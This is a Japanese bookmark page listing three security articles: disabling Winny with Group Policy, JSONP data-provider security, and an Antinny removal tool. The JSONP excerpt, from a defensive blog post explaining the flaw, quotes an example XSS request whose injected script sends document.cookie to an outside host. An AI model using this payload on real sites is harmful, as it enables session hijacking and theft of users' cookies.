タグ

セキュリティに関するbangbangshootのブックマーク (3)

  • グループ・ポリシーでWinnyの実行を禁止する - @IT

    Windows OSの機能を使ってWinnyを禁止するためには、Active Directoryのグループ・ポリシーを使う方法がある。実行ファイル(Winny.exe)をグループ・ポリシーの「ソフトウェアの制限のポリシー」に登録しておくと、指定されたプログラムの起動が禁止されるという機能である。この機能については関連記事でも取り上げているが、TIPSでは、Winnyの実行を禁止する具体的な設定方法についてまとめておく。ただしこのポリシーはWindows XPおよびWindows Server 2003でしか利用できない方法である。 グループ・ポリシーの[ソフトウェアの制限ポリシー]を利用するためには、まずポリシーを設定したい組織単位(OU)を選択してからグループ・ポリシー・エディタを開く。そして[コンピュータの構成]の[Windowsの設定]-[セキュリティの設定]-[ソフトウェアの制限

  • Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて

    « E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;

  • アンラボ・ホームページ - Antinny専用ワクチンダウンロード

    専用ワクチン使用上の注意 専用ワクチンは、特定ウイルスに感染した場合、速やかにウイルスの駆除を 行なえるようにウイルス検出、駆除機能を追加したファイルです。 専用ワクチンをご使用になる前に、下記の事項を必ずお読みください。 専用ワクチンは、感染したシステムを治療するために作成されています。   ウイルス感染を予防するシステム監視機能は提供しておりません。 V3 のシステム監視機能や他社のリアルタイム監視が実行している状態では、正常に動作しません。   必ずリアルタイム監視機能をオフ(一時停止)にした後、アンラボの専用ワクチンをご使用ください。 専用ワクチンの定期アップデートは行なっておりません。 (現在のバージョン 2006.04.05) Antinny など、Winny (ウィニー)/Shareで拡散する悪性コードを検出駆除するツール です。Winny/Share

  • 1